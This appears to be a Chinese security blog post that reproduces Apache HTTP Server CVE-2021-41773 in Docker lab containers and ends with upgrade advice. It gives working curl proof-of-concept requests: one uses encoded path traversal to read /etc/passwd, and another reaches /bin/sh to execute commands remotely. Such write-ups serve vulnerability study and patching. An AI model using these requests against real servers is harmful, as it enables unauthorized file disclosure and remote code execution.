漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

目录

漏洞简介

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

漏洞利用

二、Vulnerable RCE config(易受攻击的 RCE 配置)

环境搭建

 漏洞利用

 漏洞修复


漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录Require all granted 允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令(RCE)

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)_第1张图片 

漏洞利用

使用POC: curl http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)_第2张图片 

 Burp抓包

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)_第3张图片

 

二、Vulnerable RCE config(易受攻击的 RCE 配置)

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令

环境搭建

docker pull blueteamsteve/cve-2021-41773:with-cgid
 
docker run -dit -p 8081:80 blueteamsteve/cve-2021-41773:with-cgid

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)_第4张图片 

 漏洞利用

curl 'IP:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

 

 Burp抓包

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)_第5张图片

 漏洞修复

升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版

你可能感兴趣的:(apache,http,安全)